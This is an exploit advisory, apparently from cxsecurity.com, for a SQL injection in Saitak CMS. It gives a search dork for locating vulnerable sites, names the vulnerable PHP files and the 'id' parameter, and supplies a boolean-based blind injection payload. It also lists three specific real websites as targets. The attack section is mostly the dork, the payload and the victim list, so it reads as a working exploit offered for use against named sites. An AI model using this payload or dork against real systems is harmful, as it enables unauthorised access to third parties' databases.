Saitak cms sql injection vulnerability

2017.11.13
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

[+] Exploit Title ; Saitak cms sql injection vulnerability [+] Date : 2017-11-13 [+] Author : 0P3N3R From IRANIAN ETHICAL HACKERS [+] Vendor Homepage :http://saitak.net/ [+] Dork : intext:"Designed By Saitak Design Co." inurl:php?id= [+] Tested On : windows 10 - kali linux 2.0 [+] Contact : https://telegram.me/WebServer [+] Poc : [!] Vulnerability Files : [*] article.php [*] view.php [*] news.php Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=33' AND 3774=3774 AND 'LuXu'='LuXu [+] Target : [!] http://navakmusic.com/news.php?id=19 [!] http://www.financialaward.ir/article.php?id=33 [!] http://nosakh.net/news.php?newsid=127


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top